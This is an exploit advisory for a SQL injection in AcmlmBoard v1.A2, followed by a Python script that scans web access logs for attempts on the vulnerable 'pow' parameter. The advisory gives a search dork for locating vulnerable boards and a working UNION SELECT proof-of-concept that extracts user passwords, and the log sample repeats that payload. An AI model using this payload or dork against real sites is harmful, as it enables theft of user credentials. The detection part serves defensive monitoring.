
AcmlmBoard 1.A2 - 'pow' SQL Injection

Author: anonymous
type: webapps
platform: php
date_added: 2008-06-29 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-50129;CVE-2008-5198 

######################
#
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This board software fails to properly validate some variables that are used in SQL queries.
#An attacker can easily get sensitive information from the database by
#injecting unexpected SQL queries.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

# milw0rm.com [2008-06-30]
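
A detection check for the injection point described above, added here as an example (not part of the original advisory or of AcmlmBoard's code): it scans web server access-log lines for memberlist.php requests whose decoded `pow` value is not a plain integer. The integer-only expectation for `pow`, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `pow` value is a short plain integer (optionally negative).
VALID_POW = re.compile(r"-?\d{1,4}")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_pow(log_line):
    """Return the decoded `pow` value if the line is a memberlist.php request
    whose `pow` parameter is not a plain integer, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/memberlist.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("pow", []):
        # An empty `pow=` is treated as benign (no filter supplied).
        if value and not VALID_POW.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_pow) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_pow(line)
        if value is not None:
            hits.append((n, value))
    return hits


# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2008:10:00:01 +0000] "GET /board/memberlist.php?sort=&pow=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Jun/2008:10:00:05 +0000] "GET /board/memberlist.php?sort=posts&pow= HTTP/1.1" 200 8342',
    '198.51.100.7 - - [30/Jun/2008:10:02:11 +0000] "GET /board/memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+ HTTP/1.1" 200 9120',
    '192.0.2.44 - - [30/Jun/2008:10:03:00 +0000] "GET /board/index.php?pow=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric pow value: {value!r}")
```

Matching on the decoded value rather than the raw query string means percent-encoded and `+`-encoded variants of the same request are flagged alike.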